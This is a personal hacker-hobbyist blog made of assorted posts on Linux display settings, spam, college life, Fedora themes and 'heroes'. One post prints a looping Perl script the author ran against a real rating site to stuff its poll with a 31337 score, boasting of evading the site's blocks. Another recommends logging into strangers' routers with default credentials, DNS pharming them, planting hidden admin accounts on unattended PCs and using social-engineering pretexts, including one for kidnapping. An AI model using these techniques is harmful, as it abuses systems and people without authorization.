Kalimat al-Mutafalsif

So... I can run this laptop (Dell Inspiron 9100 with ALLLLLL the trappings) under Windows up at 1900x1200. Gorgeous display, really. Well, I've never actually had a hack session on my xorg.conf to get it going at that resolution (its only at 1280x768.... abysmal). Well... I think I found my problem...

Yup, according to that my screen is updating -15596 times a second. Huh... guess that explains why i get headaches from coding on MountainDont all the time. Hopefully I'll throw up a fixed version as soon as I restart the X server.

EDIT: Yup, with just a little tweaking the laptop now shows at 1280x800 and 60 Hz refresh. Much better place to start.

No, not a political essay, actually an interesting surge of visitors from other countries, mainly European. This interests me because I've also seen a surge of spam comments, about 300+ a week. Now, I can't really trace any of said spam comments back to those IPs, nor am I speculating that Europeans are the cause of spam. I'd be very interested to learn I have an international reader base, so feel free to comment to that regard if its true.

However, my theory goes like this. Recently there's been a huge surge in email spam. This is quite a well run operation out of Russia that uses gorgeous virii to send the spam. Why do I call them gorgeous? Because they all act in a Peer to Peer fasion, and have the ability to get around spam filters quite nicely. They do this by including random text (not so hard, but they don't pull from any one bank of words, so it breaks some heuristics) as well as including text in images that can be randomly tweaked, and each are completely different. Now that's cool. Plus it also has a built in virus scanner.
Read More »

I'll start by saying i had an awesome Thanksgiving break. I had been hoping to find something about it to post about (mainly because the drive is 10-12 hours to where I went, and I had tons of time to think) and... wow... got all I hoped for and more. To summarize: Food (Grandma cooking), no computers (relaxation), meeting new relatives (interesting), and getting to know my inner child (just plain fun). Also some other junk I'll throw in. No, this isn't an emo post about my life either, there were some interesting things that arose.

Read More »

Well, in case you can't guess from the title, it's been exactly a year since I started this blog. To be more specific, it was November 20th of last year that I registered the domain. This post also (totally not planned, I swear) happens to be my 100th. Again, to be more specific it's my 100th page... pages include things such as my warhammer picture pages and the others you find under "Pages" on the right. So, this'll be a fun past, five days in the making, about all kinds of things dealing with the past year. ((Published a second time, I apologize))

Some History
The domain was registered while taking one of my patented Long Thanksgiving Breaks. That was ThanksGaming 2005, and I grabbed the domain one night while talking to that coder I always mention, Malaprop of Cambrian House. Malaprop kindly put the domain on his site, installed WordPress, and away I went. My first actual post (I believe) was on the 20th of 2005, but it was accidentally deleted, so the first surviving post is from the 21st.
Read More »

I've been parsing (read: reading stattraq) my logs recently, and am shocked to find two things.

First off, I get multiple image hits a day from google image searches for Linux. They all point back to my Infinite Linux Desktop post. I checked some searches and it doesn't appear I'm too high, so some people must just get bored, search for linux desktop pictures and start digging through every single picture.

The second is related, but instead of people being bored and looking through a ton, I am really high on certain searches. It turns out my post on how to legally hack your grade has gotten fairly high on a few search engines. Specifically ask.com lists me as second if you search on how to hack your grade. While I'm flattered to get more hits... I really don't like the fact that people are coming here to learn how to break the law. Specifically if you're looking for a step by step to hack a gradebook... you're in the wrong place.

Anyone I consider a hacker would go down a different route. For instance, instead of finding a file that tells exactly how to beat the system, they'd start by observing their teacher, and the systems they use. After that, they'd probably go look up vulnerabilities on said systems. After that, whether they actually go through with the plan is up to them. Suffice it to say I consider anyone who grabs a walkthrough to actually PASS A CLASS ILLEGALLY is nothing but a script-kiddie. That is not a compliment from those who don't know, it means all they can do is use what some other real hacker gives them and can't come up with real attacks.

The information I give is a specific attack on people's trust, not necessarily a way to pass a class. In addition, it is not exactly a step by step guide. You'll have to improvise somewhat for that guide for each situation. Unlike what these people are looking for, a file that gives instructions such as "type X into console, wait for Y".

So, while I'm flattered people think this site will teach them how to break systems, I am most definately saddened that people are actually coming with the intent to copy my work and try to pass high school.

Well, here's a bunch of random ideas strung together in an update on my life so far this year. For those keeping track I'm into my thirs year of college, and credit-wise am a senior.

First off, I changed my layout back to what it was when I started the blog. Mainly because that other one I used had some quirks to it I didn't like. I hope to come up with a new one somewhat soon as well as adding a domain (Note, domain is empty as of right now not even a server for it) that I've always wanted which *just* became available.

Really busy this semester with research. Have an indepent research class with a professor I absolutely love. The guy's pretty smart when it comes to security, systems, and computer science in general. I'm in another of his courses and have to do a project (thankfully related) for that class as well. On top of that there's some ideas I want to flesh out on my own that could lead to papers. Finally, ya'll know I program for fun as well, and I barely have time for that. Hence, this blog is gonna be sorely ignored for most of the semester.

My love for Arabic is finally starting to take a back seat to security issues, so I might be able to finally make a decision about where I want my life to head. However, as with all things in my life that decision's going to be quite complicated and will not end with a definitive one or the other answer.

I may have an awesome opportunity for an internship in the spring. Don't want to say any more than that for fear of jinxing it, as I'm fairly certain I won't get it, but it'd be amazing if I did.

I'm always looking forward to entertaining so anyone interested in seeing the research I'm working on, or just coming for a college visit that can find me in real-life, make sure to drop me a line, this school is gorgeous in the fall.

Finally I'm being hit hard by spam posts. Most for porn, the others for cheap sex pills. Sorry for the misspelling... s3x p1lls. Akismet catches most of it (about 200 a week) but about 4 have been getting through a week, annoying.

I'm posting this as is, since time is key on this post. My CSS is screwed somehow, have to fix that, also it appears they caught on to my trick, and might validate now.

So... one big caveat of 'secure programming" is to validate anything you're given. if you don't check that you get what you expect, well, people will give you something you don't, and Bad Things happen. The worst offender of this little problem is the internet. Yup, a lot of web sites figure "We'll put a cap on the web form's input, and not check server side, that'd be inefficient." Interesting theory, lets see what happens when you make this assumption on http://www.ratemydesktop.co.uk, where I posted a screenshot of my desktop.

First off, quick HTMl lesson for those of you who don't know. To display a form, a form being a place the user can input data, on a website, you use the

<form>

tag. So, a full form might look something like


<form>
<input type='radio' onClick="window.location='index.php?ac=0&id=165&rating=1';">1
<input type='radio' onClick="window.location='index.php?ac=0&id=165&rating=2';">2
<input type='radio' onClick="window.location='index.php?ac=0&id=165&rating=3';">3
<input type='radio' onClick="window.location='index.php?ac=0&id=165&rating=4';">4
<input type='radio' onClick="window.location='index.php?ac=0&id=165&rating=5';">5
<input type='radio' onClick="window.location='index.php?ac=0&id=165&rating=6';">6
<input type='radio' onClick="window.location='index.php?ac=0&id=165&rating=7';">7
<input type='radio' onClick="window.location='index.php?ac=0&id=165&rating=8';">8
<input type='radio' onClick="window.location='index.php?ac=0&id=165&rating=9';">9
<input type='radio' onClick="window.location='index.php?ac=0&id=165&rating=10';">10
<input type='radio' onClick="window.location='index.php?ac=2&id=165';">Don't vote
</form>


So, the above is an example of a bad form, but a form none the less, for a poll. You have 10 radio buttons, and when you click any of them, it sends you to a page that adds the vote. This is kind of a bad way to do things, I'd make those regular buttons, not rado buttons, but that's just me.

Now, where's the hack here? Can anyone spot why this is a horrible form? I'll give you a hint, it's in "window.location='index.php?ac=0&id=165&rating=8". window.location is javascript that sends you to another page. So what this does is sends you to index.php, and passes it a few variables. now do you see it? It, first off, just sends the data as GET variables. That can be easily faked. Second it sends the rating as a variable too. Now, to make this secure, you should check that the rating is between 1 and 10. Also, send this as POST, so people can't just send the data in the URL bar as a fake. Finally, whatever page you send it to should have some sort of limit on connections from one IP, and votes per IP at the very least. Otherwise, people do stupid things like this. Note both the number of votes as compared to others, as well as the rating. (It's trending to 31337, just for fun).

So, how'd I do that? I used a fun perl module called WWW::Mechanize (overkill, I know), and made it go to the webpage on rating 10. (Those links above, they're for my desktop). The whole thing is 11 lines, with some that can easily cut out (I think it could easily be only 6). Here it is:

#!/usr/bin/perl

use WWW::Mechanize;
my $mech = WWW::Mechanize->new( autocheck => 1 );
$vote_page = "http://www.ratemydesktop.co.uk/index.php?ac=4&id=165&rating=31337&tp=4&sstr=155";
$x = 1;
while($x ne -1) {
        print "Voting - $x\n";
        $mech->get( $vote_page );
        $x++;
}

Finally, I ssh'd into my box at home, where I wrote the above script, and started it running a coupla times.

I realize this post is kinda rambling, but I'm writing it as I do this, and I've gotta get off to class. It appears they did kill my connections just now, all of them at once, but I was able to start them right back up. However, I stopped influencing the rating a while ago, so they might indeed have some sort of check in place. No matter, I've got enough IPs to get it to 31337 soon enough.

You know what happens when you assume, right? Maybe you do, maybe you don't. I've spent the day musing over various assumptions, how I've used them, and how they can be used, and I think its something everyone should know.

As a broad overview I'll go over the different types of assumptions, as I see them. Then talk about how the fit into hacking, and finally examples from my life that back this up.

Safe Assumptions
What do you think when you see a pretty girl with a ring on her left ring finger? She's married.
How does the assumption change if its a diamond on a silver band, versus a plain gold band? She's only engaged.
Two people holding hands somewhere? They must be dating.

Are the above always true? No. I have friends that wear rings on that finger, who are single. I know others who just like to hold something, so holding hands or linking arms means nothing to them. In the Middle East it is quite common for close male friends to hold hands. Doesn't mean they're dating, just they're close friends.

I'm calling these "safe assumptions" however, because you're almost always going to be right.

Weaker Assumptions
Now, for a weaker assumption, lets use context. I see a person, early 20s on a college campus.

How would they consider themselves politically? Good guess, would be liberal.
What year are they? If near dorms, guess underclassman, if near off campus living, guess upperclassman.
Dressed really fancy? If there's no obvious parties going on, I'd guess in their final year, and going to a job interview.

Poor Assumptions
These are the basis of more hacks and cracks then anything else. I speak, of course, of the buffer overflow, where a programmer assumed "That could never happen", "Who would input that", or "Why would someone try that?!"

These are really, really bad, as assuming someone won't try something, or something won't happen is begging for something bad to happen if it does.

Hacking
Some, especially the political, of the above assumptions people will jump on me for. "You can't assume that!" or "How do you know that's true?!" Answer is, I don't, I assume it to be true. And that's where, with a little luck, this plays into hacking. By hacking, I should clarify that I mean both cracking other systems, as well as social engineering.

So, how can assuming something to be true, versus knowing its truth value, help you? Let me go back to my basic assumptions. You see a young woman, she has a gold band on her finger. I could tell her I know her husband. She'll think "I never told him I have a husband" and might believe you. She wouldn't stop to think she's telling the world she has one. I do say young here, because the two ways this breaks down is if the husband has already died, or she's married to a woman. Can't do anything about the latter, but unless it was an accident, if she's young the husband will still be alive.

So who cares if I can guess she has a husband? I could pose as someone who knows him, if I wanted to kidnap her (notice how big of a problem this is in other places of the world, and a DEFINATE source of money). Or, perhaps, I just want to make myself seem friendly so that she'll listen to a sales pitch.

Ok, I might be stretching that one. But here's a way it pertains to hacking. If you buy a Linksys router the default wireless ESSID is linksys. The default login is admin:admin. Unless you know to change that those values stay forever. So, one might work at Best Buy, and note who buys linksys routers. You could also just go war driving for "linksys" access points, but that doesn't help my argument. Find people with a linksys router, you can assume the default login is still good if they've not changed the ESSID. Login to the router, and do whatever you want. I'd recomend DNS pharming them just because its a trick I came up with (attacking DNS settings on wifinetworks for the purpose of farming).

better, its a safe bet that a new Windows machine is not setup to prevent access physically. By default there's no login manager, so if you notice Dell boxes outside of a company, you might be able to walk up, and login to the new system. Throw an admin account on there, hide it, and walk out.

But, I want to stay mainly with social engineerring. So here's how I use it

My Games
I love games. I also love hacking. So i combine them to make my life one gigantic war game of hacking. Social, computer, whatever. I keep it legal, mostly, and only go so far... not over the line.

To that end, my goal is always to make as many "safe" assumptions as possible. This is almost never possible, as whenever I run an "op" on someone, by which i mean guessing as much about their life as possible or hacking in some other way, I almost never know them ahead of time. That's where context comes in. You may notice under "Weaker" assumptions I give context. I do that because without context, guessing a random person's political afifliation is neigh impossible. However, adding in that most young people are liberal, as well as most college campuses voted democratically in the last election (check for yourself), it becomes almost a safe bet a college student would consider themselves liberal. It is also important how you phrase this. Note that I did not say "Is liberal", I said "consider themselves liberal". Because most are also going to care what their peers think, they won't say "conservative" because they're afraid people will associate htem with the present administration. So here, how you pose the assumption is also quite important.

So, I opened a bank account recently. I didn't much like the service I was given. So, instead of being my normal polite self I only spoke when I abslutely had to, and spent the rest of the time analyzing the lady who was making the account. I'd say she had one kid, middle school aged, and a husband that worked. I made this assumption because she had kids artowrk in teh walls, and someone called to tell her they were home. For a more detailed analysis of how I came to the conclusion, feel free to get in touch with me, but take my word for it they were really safe assumptions.

This is just a broad overview of what I've been thinking about today, and as always is designed to make you think about it and come to your own conclusions. I'd welcome comments expanding on this, as I've just begun to think about it today.

Well, some of you know why I like Linux. I've got another to add today, the amazing, gorgeous Graphical user Interface (GUI). What? Did he just say Linux's GUI was better then Windows? Yes, yes I did. I finally believe it too.

To explain why, I just installed the new Fedora Core 5. Its been out, oh, 15 days so far. Fedora is the bleeding edge version of Red Hat, and as such is jam packed with drivers. First off, the install actualy looks new, which is a major plus. Second, it was easy as anything, much more so then Windows, as it doesn't interrupt you in the middle. Also a plus. Finally, it recognized my ATI video card right off (ATI sucks with Linux), and I got 1900x1400 resolution with no work on my part, other then sliding the slider up from a measly 1280x1024.

Then I spent the next few hours tweaking the themes, login screens, and everything I could find. Here's that I've got for a desktop right now. (Warning!!! Large picture, it's at my 1900 resolution!) I've got a cycle of 4 login screens, all darker colors, and as I get more, I'll add screenshots here.

Well, last night I saw a news story that got me really fired up. I wrote a rather lengthy post about it, saved the draft, and went to sleep. I'm glad I did. I got up today thinking a bit more rationally, and trying to determine the purpose of this blog. So far I've used it to talk (rant) about various tech decisions and products, gaming I do, and things I've done. I've tried my best to keep religion and politics out of it, for those are two subjects that tend to tear societies apart. My post last night would have infringed a little on those, but it was more of a semantics argument that I feel would be out of place on this website, which I'm trying to keep moderate. I did, however, decide that, due to the hacker nature I lean towards, posing it as questions would be a lot more helpful. I won't tell you my answers, but these are things you should think about, as the term is used a lot in today's American culture.

What makes a "hero"?
Does dieing for any reason make one a "hero"?
Are you automatically a "hero" if your job puts you in harms way?
Can you be a "hero" when not in any danger?
If you know what your job requires, and you accept it, are you a "hero"?
Does telling someone you can't do anything make one a "hero"?

I found that these are good questions to muse on, and also that the answer is not black and white. What I consider a "hero" can be radically different from how you define it. I've always had a problem seeing things in black and white, ones and zeroes, which has actually caused some problems for me. So, I end this post urging you to think about everything around you. Don't accept what you hear in the media, from the government, from your peers, but only what you accept for yourself. I'm not a conspiracy theorist, I'm not trying to say the government's trying to keep the people down, what I'm saying is everything you hear is coming from another person's perspective, question it before accepting it.